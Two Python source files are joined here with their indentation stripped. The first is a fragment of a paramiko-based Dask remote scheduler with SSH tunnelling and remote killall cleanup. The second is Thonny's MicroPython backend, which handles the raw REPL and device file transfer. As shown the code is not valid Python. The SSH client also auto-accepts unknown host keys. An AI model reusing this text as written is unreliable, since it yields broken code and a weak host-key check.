channel.exec_command(self.command)
# client.exec_command(self.command)
while True:
# if channel.exit_status_ready():
# break
rl, wl, xl = select.select([channel], [], [], 10.0)
if len(rl) > 0:
msg.logMessage("rl:", channel.recv(1024),msg.DEBUG)
msg.logMessage("Ending Dask Worker",msg.INFO)
# client = paramiko.SSHClient()
# client.load_system_host_keys()
# client.connect('edison.nersc.gov', username="hkrishna")
class RemoteScheduler():
"""
Create a remote executor
"""
def __init__(self, addr, username, loop, password, machine, runscript):
self.loop = loop
self.addr = addr
self.username = username
self.password = password
self.command = runscript
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.client.load_system_host_keys()
if len(password) > 0:
self.client.connect(addr, username=username, password=password)
else:
self.client.connect(addr, username=username)
stdin, stdout, stderr = self.client.exec_command(
"python -c 'import socket; s=socket.socket(); s.bind((\"\", 0)); result = socket.gethostbyname(socket.gethostname()) + \":\" + str(s.getsockname()[1]); s.close(); print(result)'")
stdin.close()
for line in stdout.read().splitlines():
result = line
self.remote_addr = result.split(":")
self.local_port = self.get_free_port()
if len(machine) > 0:
self.remote_addr[0] = machine
msg.logMessage((self.local_port, self.remote_addr),msg.DEBUG)
self.start_scheduler(self.remote_addr[0], self.remote_addr[1], self.client, password, runscript)
self.executor = None
self.forward_tunnel(self.local_port, self.remote_addr[0], self.remote_addr[1], self.client.get_transport())
def execute(self):
msg.logMessage("Starting Executor",msg.INFO)
# self.executor = Executor("{0}:{1}".format(self.remote_addr[0], self.remote_addr[1]))
self.executor = Executor("{0}:{1}".format("localhost", self.local_port))
msg.logMessage("End Executor",msg.INFO)
def close(self):
self.client.exec_command("killall dask-scheduler dask-worker")
self.client.exec_command("killall " + os.path.basename(self.command))
def get_free_port(self):
s = socket.socket()
s.bind(("", 0))
localport = s.getsockname()[1]
s.close()
return localport
"""
def start_slurm_worker(self, ipaddr, port, nodes, partition, time, procs, threads, client):
self.dask_worker = DaskWorker(client, ipaddr, port, nodes, partition, time, procs, threads)
server_thread = threading.Thread(target=dask_worker.serve)
server_thread.daemon = True
server_thread.start()
"""
def start_scheduler(self, ipaddr, port, client, password, runscript):
self.dask_sched = DaskScheduler(client, ipaddr, port, password, runscript)
server_thread = threading.Thread(target=self.dask_sched.serve)
# server_thread.daemon = True
server_thread.start()
def forward_tunnel(self, local_port, remote_host, remote_port, transport):
class SubHander(Handler):
chain_host = remote_host
chain_port = int(remote_port)
ssh_transport = transport
fs = ForwardServer(('', int(local_port)), SubHander)
msg.logMessage(("FORWARDING: ", local_port, remote_host, remote_port),msg.INFO)
server_thread = threading.Thread(target=fs.serve_forever)
server_thread.daemon = True
server_thread.start()
|
backend.py | from thonny.common import (
InputSubmission,
InterruptCommand,
EOFCommand,
parse_message,
ToplevelCommand,
ToplevelResponse,
InlineCommand,
InlineResponse,
UserError,
serialize_message,
BackendEvent,
ValueInfo,
)
import sys
import logging
import traceback
import queue
from thonny.plugins.micropython.connection import (
ConnectionClosedException,
ConnectionFailedException,
)
from textwrap import dedent
import ast
import re
from queue import Queue, Empty
import threading
import os
import time
from thonny.misc_utils import find_volumes_by_name, sizeof_fmt
import jedi
import io
import tokenize
from thonny.running import EXPECTED_TERMINATION_CODE
import binascii
import shutil
# See https://github.com/dhylands/rshell/blob/master/rshell/main.py
# for UART_BUFFER_SIZE vs USB_BUFFER_SIZE
# ampy uses 32 bytes: https://github.com/pycampers/ampy/blob/master/ampy/files.py
# I'm not worrying so much, because reader thread reads continuously
# and writer (SerialConnection) has it's own blocks and delays
BUFFER_SIZE = 512
BAUDRATE = 115200
ENCODING = "utf-8"
# Commands
RAW_MODE_CMD = b"\x01"
NORMAL_MODE_CMD = b"\x02"
INTERRUPT_CMD = b"\x03"
SOFT_REBOOT_CMD = b"\x04"
# Output tokens
THONNY_MSG_START = b"\x02"
THONNY_MSG_END = b"\x04"
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
LF = b"\n"
OK = b"OK"
# first prompt when switching to raw mode (or after soft reboot in raw mode)
# Looks like it's not translatable in CP
# https://github.com/adafruit/circuitpython/blob/master/locale/circuitpython.pot
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
RAW_PROMPT = b">"
BLOCK_CLOSERS = re.compile(
b"|".join(map(re.escape, [LF, EOT, THONNY_MSG_START, NORMAL_PROMPT, FIRST_RAW_PROMPT]))
)
logger = logging.getLogger("thonny.micropython.backend")
def debug(msg):
return
print(msg, file=sys.stderr)
class MicroPythonBackend:
def __init__(self, connection, clean, api_stubs_path):
self._connection = connection
self._cwd = None
self._interrupt_requested = False
self._cancel_requested = False
self._command_queue = Queue() # populated by reader thread
self._progress_times = {}
self._api_stubs_path = api_stubs_path
self._command_reading_thread = threading.Thread(target=self._read_commands, daemon=True)
self._command_reading_thread.start()
self._startup_time = time.time()
self._ctrl_suggestion_given = False
try:
self._prepare(clean)
self._mainloop()
except ConnectionClosedException:
self._on_connection_closed()
except Exception:
logger.exception("Crash in backend")
traceback.print_exc()
def _prepare(self, clean):
if clean:
self._interrupt_to_raw_prompt()
self._clear_environment()
else:
self._process_until_initial_raw_prompt()
self._cwd = self._fetch_cwd()
self._welcome_text = self._fetch_welcome_text()
self._builtin_modules = self._fetch_builtin_modules()
self._builtins_info = self._fetch_builtins_info()
self._send_ready_message()
def _mainloop(self):
while True:
try:
self._cancel_requested = False
self._interrupt_requested = False
self._check_for_connection_errors()
cmd = self._command_queue.get(timeout=0.1)
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(False)
elif isinstance(cmd, InterruptCommand):
self._interrupt()
else:
self.handle_command(cmd)
except Empty:
self._check_for_idle_events()
except KeyboardInterrupt:
self._interrupt()
def _fetch_welcome_text(self):
self._connection.write(NORMAL_MODE_CMD)
welcome_text = self._connection.read_until(NORMAL_PROMPT).strip(b"\r\n >")
if os.name != "nt":
welcome_text = welcome_text.replace(b"\r\n", b"\n")
# Go back to raw prompt
self._connection.write(RAW_MODE_CMD)
self._connection.read_until(FIRST_RAW_PROMPT)
return welcome_text.decode(ENCODING)
def _fetch_uname(self):
res = self._evaluate("__thonny_os.uname()", prelude="import os as __thonny_os")
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _fetch_builtin_modules(self):
out, err, _ = self._execute("help('modules')", capture_output=True)
assert not err, "Error was: %r" % err
modules_str_lines = out.strip().splitlines()
last_line = modules_str_lines[-1].strip()
if last_line.count(" ") > 0 and " " not in last_line and "\t" not in last_line:
# probably something like "plus any modules on the filesystem"
# (can be in different languages)
modules_str_lines = modules_str_lines[:-1]
modules_str = (
" ".join(modules_str_lines)
.replace("/__init__", "")
.replace("__main__", "")
.replace("/", ".")
)
return modules_str.split()
def _fetch_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._api_stubs_path, "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _fetch_cwd(self):
return self._evaluate(
"__thonny_os.getcwd() if hasattr(__thonny_os, 'getcwd') else ''",
prelude="import os as __thonny_os",
)
def _send_ready_message(self):
self.send_message(ToplevelResponse(welcome_text=self._welcome_text, cwd=self._cwd))
def _check_send_inline_progress(self, cmd, value, maximum, description=None):
assert "id" in cmd
prev_time = self._progress_times.get(cmd["id"], 0)
if value != maximum and time.time() - prev_time < 0.2:
# Don't notify too often
return
else:
self._progress_times[cmd["id"]] = time.time()
if description is None:
description = cmd.get("description", "Working...")
self.send_message(
BackendEvent(
event_type="InlineProgress",
command_id=cmd["id"],
value=value,
maximum=maximum,
description=description,
)
)
def _interrupt(self):
self._connection.write(INTERRUPT_CMD)
def _check_for_interrupt(self, action_scope):
if action_scope == "device" and self._interrupt_requested:
self._interrupt()
self._interrupt_requested = False
if action_scope == "local" and self._cancel_requested:
self._cancel_requested = False
raise KeyboardInterrupt()
def _interrupt_to_raw_prompt(self):
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
discarded_bytes = b""
for delay in [0.05, 0.5, 0.1, 2.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
self._connection.reset_output_buffer()
self._connection.write(INTERRUPT_CMD)
self._connection.write(RAW_MODE_CMD)
time.sleep(delay)
discarded_bytes += self._connection.read_all()
if discarded_bytes.endswith(FIRST_RAW_PROMPT) or discarded_bytes.endswith(b"\r\n>"):
break
else:
raise TimeoutError("Can't get to raw prompt. Read bytes: " + str(discarded_bytes))
def _soft_reboot(self, side_command):
if side_command:
self._interrupt_to_raw_prompt()
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(NORMAL_MODE_CMD)
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(SOFT_REBOOT_CMD)
if not side_command:
self._process_until_raw_prompt()
self.send_message(ToplevelResponse(cwd=self._cwd))
def _read_commands(self):
"works in separate thread"
while True:
line = sys.stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
if isinstance(cmd, InterruptCommand):
self._interrupt_requested = True
self._cancel_requested = True
else:
self._command_queue.put(cmd)
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
def create_error_response(**kw):
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
response = create_error_response(error="Interrupted", interrupted=True)
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is None:
response = {}
if response is False:
# Command doesn't want to send any response
return
elif isinstance(response, dict):
if isinstance(cmd, ToplevelCommand):
response = ToplevelResponse(command_name=cmd.name, **response)
elif isinstance(cmd, InlineCommand):
response = InlineResponse(cmd.name, **response)
if "id" in cmd and "command_id" not in response:
response["command_id"] = cmd["id"]
debug("cmd: " + str(cmd) + ", respin: " + str(response))
self.send_message(response)
def _submit_input(self, cdata: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert cdata.endswith("\n")
if not cdata.endswith("\r\n"):
# submission is done with CRLF
cdata = cdata[:-1] + "\r\n"
bdata = cdata.encode(ENCODING)
self._connection.write(bdata)
# Try to consume the echo
try:
echo = self._connection.read(len(bdata))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading echo")
return
if echo != bdata:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (bdata, echo))
self._connection.unread(echo)
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = self._cwd
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
def _send_output(self, data, stream_name):
if not data:
return
data = self._transform_output(data)
msg = BackendEvent(event_type="ProgramOutput", stream_name=stream_name, data=data)
self.send_message(msg)
def _transform_output(self, data):
# Any keypress wouldn't work
return data.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press Ctrl-C to enter the REPL. Use CTRL-D to reload.",
)
def _execute(self, script, capture_output=False):
# self._ensure_raw_propmt()
# send command
self._connection.write(script.encode(ENCODING) + EOT)
debug("Wrote " + script + "\n--------\n")
# fetch command confirmation
ok = self._connection.read(2)
debug("GOTOK")
assert ok == OK, "Expected OK, got %r, followed by %r" % (ok, self._connection.read_all())
return self._process_until_raw_prompt(capture_output)
def _execute_without_output(self, script):
out, err, value = self._execute(script, capture_output=True)
if err or out:
raise RuntimeError("Failed MP script: " + str(out) + "\n" + str(err))
return value
def _execute_print_expr(self, expr, prelude="", cleanup="", capture_output=False):
# assuming expr really contains an expression
# separator is for separating side-effect output and printed value
script = ""
if prelude:
script += prelude + "\n"
script += "print(%r, repr(%s), sep='', end=%r)" % (
THONNY_MSG_START.decode(),
expr,
THONNY_MSG_END.decode(),
)
# assuming cleanup doesn't cause output
if cleanup:
script += "\n" + cleanup
return self._execute(script, capture_output)
def _evaluate(self, expr, prelude="", cleanup=""):
_, _, value_repr = self._execute_print_expr(expr, prelude, cleanup)
if value_repr is None:
return None
else:
return ast.literal_eval(value_repr)
def _process_until_initial_raw_prompt(self):
self._connection.write(RAW_MODE_CMD)
try:
self._process_until_raw_prompt()
except KeyboardInterrupt:
self._interrupt()
def _process_until_raw_prompt(self, capture_output=False):
"""
Forwards output, extracts Thonny message, replaces normal prompts with raw prompts.
This is executed when some code is running or just after requesting raw prompt.
After submitting commands to the raw REPL, the output should be like
{stdout}\x04\{stderr}\x04\n\>
In the end of {stdout} there may be \x02{value-for-thonny}
Interrupts will alter the execution, but from the response parsing
perspective they don't matter as they look like any other exception.
Things get complicated because of soft-reboots, which always end with
regular prompt. Soft-reboots can occur because of Ctrl+D, machine.soft_reset()
and even reset button (micro:bit).
Because of soft-reboot we can't assume we'll find the terminating markers for
each command.
Output produced by background threads (eg. in WiPy ESP32) cause even more difficulties,
because it becomes impossible to say whether we are at prompt and output
is from another thread or the main thread is running.
For now I'm ignoring these problems and assume all output comes from the main thread.
"""
# TODO: experiment with Ctrl+C, Ctrl+D, reset
eot_count = 0
value = None
done = False
output = b""
out = b""
err = b""
while not done:
if (
self._connection.num_bytes_received == 0
and not self._ctrl_suggestion_given
and time.time() - self._startup_time > 1.5
):
self._send_output(
"\n"
+ "Device is busy or does not respond. Your options:\n\n"
+ " - check the connection properties;\n"
+ " - make sure the device has suitable firmware;\n"
+ " - make sure the device is not in bootloader mode;\n"
+ " - wait until current work is complete;\n"
+ " - use Ctrl+C to interrupt current work.\n",
"stderr",
)
self._ctrl_suggestion_given = True
# There may be an input submission waiting
# and we can't progress without resolving it first
self._check_for_side_commands()
self._check_for_interrupt("device")
# Process input in chunks (max 1 parsing marker per chunk).
# Prefer whole lines (to reduce the number of events),
# but don't wait too long for eol.
output += self._connection.soft_read_until(BLOCK_CLOSERS, timeout=0.05)
stream_name = "stderr" if eot_count == 1 else "stdout"
if output.endswith(THONNY_MSG_START):
debug("MSGSTA: " + str(output))
output = output[: -len(THONNY_MSG_START)]
# Low chance of failure (eg. because of precisely timed reboot),
# therefore it's safe to use big timeout
temp = self._connection.soft_read_until(THONNY_MSG_END, timeout=3)
if temp.endswith(THONNY_MSG_END):
value = temp[: -len(THONNY_MSG_END)]
debug("GOTVALUE: " + str(value))
else:
# failure, restore everything to help diagnosis
output = output + THONNY_MSG_START + temp
elif output.endswith(EOT):
debug("EOT: " + str(output))
output = output[: -len(EOT)]
eot_count += 1
if eot_count == 2:
# Normal completion of the command
# big chance of being at the raw prompt
temp = self._connection.soft_read_until(RAW_PROMPT, timeout=0.1)
if temp == RAW_PROMPT and self._connection.incoming_is_empty():
done = True
elif temp:
# Failure, temp needs to be parsed again
self._connection.unread(temp)
elif output.endswith(FIRST_RAW_PROMPT) and self._connection.incoming_is_empty():
debug("FIRAPRO: " + str(output))
output = output[: -len(FIRST_RAW_PROMPT)]
done = True
elif (
output.endswith(NORMAL_PROMPT)
and self._connection.peek_incoming() == b"\r\n" + FIRST_RAW_PROMPT
):
debug("NOPRO: " + str(output))
output = output + self._connection.read_until(FIRST_RAW_PROMPT)
# skip both normal and raw prompt together
# (otherwise they get processed separately)
output = output[: -len(NORMAL_PROMPT + b"\r\n" + FIRST_RAW_PROMPT)]
done = True
elif output.endswith(NORMAL_PROMPT) and self._connection.incoming_is_empty():
debug("NOPRO2: " + str(output))
output = output[: -len(NORMAL_PROMPT)]
# switch to raw mode and continue
self._connection.write(RAW_MODE_CMD)
if output.endswith(FIRST_RAW_PROMPT[:-1]):
# incomplete raw prompt, wait for more
pass
else:
if capture_output:
if stream_name == "stdout":
out += output
else:
assert stream_name == "stderr"
err += output
else:
# TODO: deal with partial UTF-8 chars
self._send_output(output.decode(ENCODING), stream_name)
output = b""
debug("doneproc")
return (
out.decode(ENCODING),
err.decode(ENCODING),
None if value is None else value.decode(ENCODING),
)
def _clear_environment(self):
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
self._execute("globals().clear(); __name__ = '__main__'")
def _check_for_side_commands(self):
# most likely the queue is empty
if self._command_queue.empty():
return
postponed = []
while not self._command_queue.empty():
cmd = self._command_queue.get()
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(True)
else:
postponed.append(cmd)
# put back postponed commands
while postponed:
self._command_queue.put(postponed.pop(0))
def _check_for_idle_events(self):
self._send_output(self._connection.read_all().decode(ENCODING, "replace"), "stdout")
self._check_for_connection_errors()
def _supports_directories(self):
# NB! make sure self._cwd is queried first
return bool(self._cwd)
def _connected_to_microbit(self):
return "micro:bit" in self._welcome_text.lower()
def _cmd_interrupt(self, cmd):
self._interrupt()
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
if not self._supports_directories():
raise UserError("This device doesn't have directories")
path = cmd.args[0]
self._execute("import os as __thonny_os; __thonny_os.chdir(%r)" % path)
self._cwd = self._fetch_cwd()
return {}
else:
raise UserError("%cd takes one parameter")
def _cmd_Run(self, cmd):
self._clear_environment()
assert cmd.get("source")
self._execute(cmd["source"])
return {}
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
_, _, value_repr = self._execute_print_expr(cmd.source)
if value_repr is None:
value_repr = repr(None)
return {"value_info": ValueInfo(0, value_repr)}
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute(cmd.source)
return {}
def _cmd_get_globals(self, cmd):
if cmd.module_name == "__main__":
globs = self._evaluate(
"{name : repr(value) for (name, value) in globals().items() if not name.startswith('__')}"
)
else:
globs = self._evaluate(
"{name : repr(getattr(__mod_for_globs, name)) in dir(__mod_for_globs) if not name.startswith('__')}",
prelude="import %s as __mod_for_globs",
)
return {"module_name": cmd.module_name, "globals": globs}
def _cmd_get_dirs_child_data(self, cmd):
if self._supports_directories():
data = self._get_dirs_child_data_generic(cmd["paths"])
dir_separator = "/"
else:
assert cmd["paths"] == {""}, "Bad command: " + repr(cmd)
sizes = self._get_microbit_file_sizes()
root_data = {name: {"kind": "file", "size": size} for (name, size) in sizes.items()}
data = {"": root_data}
dir_separator = ""
return {"node_id": cmd["node_id"], "dir_separator": dir_separator, "data": data}
def _cmd_get_fs_info(self, cmd):
return self._get_fs_info(cmd.path)
def _cmd_write_file(self, cmd):
def generate_blocks(content_bytes, block_size):
for i in range(0, len(content_bytes), block_size):
yield content_bytes[i : i + block_size]
self._write_file(generate_blocks(cmd["content_bytes"], BUFFER_SIZE), cmd["path"])
return InlineResponse(
command_name="write_file", path=cmd["path"], editor_id=cmd.get("editor_id")
)
def _cmd_delete(self, cmd):
assert cmd.paths
paths = sorted(cmd.paths, key=lambda x: len(x), reverse=True)
try:
self._delete_via_serial(paths)
except Exception as e:
if "read-only" in str(e).lower():
self._delete_via_mount(paths)
self._sync_all_filesystems()
def _internal_path_to_mounted_path(self, path):
mount_path = self._get_fs_mount()
if mount_path is None:
return None
flash_prefix = self._get_flash_prefix()
if not path.startswith(flash_prefix):
return None
path_suffix = path[len(flash_prefix) :]
return os.path.join(mount_path, os.path.normpath(path_suffix))
def _cmd_read_file(self, cmd):
try:
content_bytes = b"".join(self._read_file(cmd["path"]))
error = None
except Exception as e:
_report_internal_error()
error = str(e)
content_bytes = None
return {"content_bytes": content_bytes, "path": cmd["path"], "error": error}
def _cmd_download(self, cmd):
total_size = 0
completed_files_size = 0
remote_files = self._list_remote_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"].rstrip("/").rstrip("\\")
download_items = []
for file in remote_files:
total_size += file["size"]
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = os.path.join(target_dir, os.path.normpath(path_suffix))
download_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in download_items]
existing_files = list(filter(os.path.exists, targets))
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in download_items:
written_bytes = self._download_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_upload(self, cmd):
completed_files_size = 0
local_files = self._list_local_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"]
assert target_dir.startswith("/") or not self._supports_directories()
assert not target_dir.endswith("/") or target_dir == "/"
upload_items = []
for file in local_files:
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = self._join_remote_path_parts(target_dir, to_remote_path(path_suffix))
upload_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in upload_items]
existing_files = self._get_existing_remote_files(targets)
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
total_size = sum([item["size"] for item in upload_items])
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in upload_items:
written_bytes = self._upload_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_mkdir(self, cmd):
assert self._supports_directories()
assert cmd.path.startswith("/")
self._makedirs(cmd.path)
self._sync_all_filesystems()
def _cmd_editor_autocomplete(self, cmd):
# template for the response
result = dict(source=cmd.source, row=cmd.row, column=cmd.column)
try:
script = jedi.Script(cmd.source, cmd.row, cmd.column, sys_path=[self._api_stubs_path])
completions = script.completions()
result["completions"] = self._filter_completions(completions)
except Exception:
result["error"] = "Autocomplete error"
return result
def _filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
response = {"source": cmd.source}
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source, len(lines), len(lines[-1]), sys_path=[self._api_stubs_path]
)
completions = script.completions()
response["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
response["error"] = "Autocomplete error"
return response
else:
# use live data
match = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if match:
prefix = match.group()
if "." in prefix:
obj, prefix = prefix.rsplit(".", 1)
names = self._evaluate("dir(%s)" % obj)
else:
names = self._evaluate("dir()")
else:
names = []
prefix = ""
completions = []
for name in names:
if name.startswith(prefix) and not name.startswith("__"):
completions.append({"name": name, "complete": name[len(prefix) :]})
return {"completions": completions, "source": source}
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
self._execute(
dedent(
"""
def __get_object_atts(obj):
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
return (result, errors)
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
and not module_name.startswith("adafruit")
# and not module_name == "builtins"
):
file_name = os.path.join(
self._api_stubs_path, module_name.replace(".", "/") + ".py"
)
self._dump_module_stubs(module_name, file_name)
def _dump_module_stubs(self, module_name, file_name):
out, err, __ = self._execute("import {0}".format(module_name), capture_output=True)
if out or err:
print("FAILED IMPORTING MODULE:", module_name, "\nErr: " + out + err)
return
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._evaluate("__get_object_atts({0})".format(object_expr))
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(fp, "{0}.{1}".format(object_expr, name), indent + " ")
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _read_file(self, path):
# TODO: read from mount when possible
# file_size = self._get_file_size(path)
block_size = 512
self._execute_without_output("__thonny_fp = open(%r, 'rb')" % path)
if "binascii" in self._builtin_modules:
self._execute_without_output("from binascii import hexlify as __temp_hexlify")
while True:
self._check_for_interrupt("local")
if "binascii" in self._builtin_modules:
block = binascii.unhexlify(
self._evaluate("__temp_hexlify(__thonny_fp.read(%s))" % block_size)
)
else:
block = self._evaluate("__thonny_fp.read(%s)" % block_size)
if block:
yield block
if len(block) < block_size:
break
self._execute_without_output(
dedent(
"""
__thonny_fp.close()
del __thonny_fp
try:
del __temp_hexlify
except:
pass
"""
)
)
def _write_file(self, content_blocks, target_path, notifier=None):
try:
result = self._write_file_via_serial(content_blocks, target_path, notifier)
except ReadOnlyFilesystemError:
result = self._write_file_via_mount(content_blocks, target_path, notifier)
self._sync_all_filesystems()
return result
def _write_file_via_mount(self, content_blocks, target_path, notifier=None):
mounted_target_path = self._internal_path_to_mounted_path(target_path)
with open(mounted_target_path, "wb") as f:
bytes_written = 0
for block in content_blocks:
self._check_for_interrupt("local")
bytes_written += f.write(block)
f.flush()
os.fsync(f)
if notifier is not None:
notifier(bytes_written)
return bytes_written
def _write_file_via_serial(self, content_blocks, target_path, notifier=None):
# prelude
try:
_, err, _ = self._execute(
dedent(
"""
__thonny_path = '{path}'
__thonny_written = 0
__thonny_fp = open(__thonny_path, 'wb')
"""
).format(path=target_path),
capture_output=True,
)
if "readonly" in err.replace("-", "").lower():
raise ReadOnlyFilesystemError()
elif err:
raise RuntimeError("Problem opening file for writing: " + err)
# Define function to allow shorter write commands
if "binascii" in self._builtin_modules:
self._execute_without_output(
dedent(
"""
from binascii import unhexlify as __thonny_unhex
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(__thonny_unhex(x))
"""
)
)
else:
self._execute_without_output(
dedent(
"""
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(x)
"""
)
)
bytes_sent = 0
for block in content_blocks:
self._check_for_interrupt("local")
if "binascii" in self._builtin_modules:
script = "__W(%r)" % binascii.hexlify(block)
else:
script = "__W(%r)" % block
self._execute_without_output(script)
bytes_sent += len(block)
if notifier is not None:
notifier(bytes_sent)
bytes_received = self._evaluate("__thonny_written")
if bytes_received != bytes_sent:
raise UserError(
"Expected %d written bytes but wrote %d" % (bytes_sent, bytes_received)
)
finally:
# clean up
self._execute(
dedent(
"""
try:
del __W
del __thonny_written
del __thonny_path
__thonny_fp.close()
del __thonny_fp
del __thonny_unhex
except:
pass
"""
)
)
return bytes_sent
def _sync_all_filesystems(self):
self._execute_without_output(
dedent(
"""
try:
from os import sync as __thonny_sync
__thonny_sync()
del __thonny_sync
except ImportError:
pass
"""
)
)
def _list_local_files_with_info(self, paths):
def rec_list_with_size(path):
result = {}
if os.path.isfile(path):
result[path] = os.path.getsize(path)
elif os.path.isdir(path):
for name in os.listdir(path):
result.update(rec_list_with_size(os.path.join(path, name)))
else:
raise RuntimeError("Can't process " + path)
return result
result = []
for requested_path in paths:
sizes = rec_list_with_size(requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
return result
def _list_remote_files_with_info(self, paths):
# prepare universal functions
self._execute_without_output(
dedent(
"""
try:
import os as __thonny_os
from os import stat as __thonny_stat
def __thonny_getsize(path):
return __thonny_stat(path)[6]
def __thonny_isdir(path):
return __thonny_stat(path)[0] & 0o170000 == 0o040000
except ImportError:
__thonny_stat = None
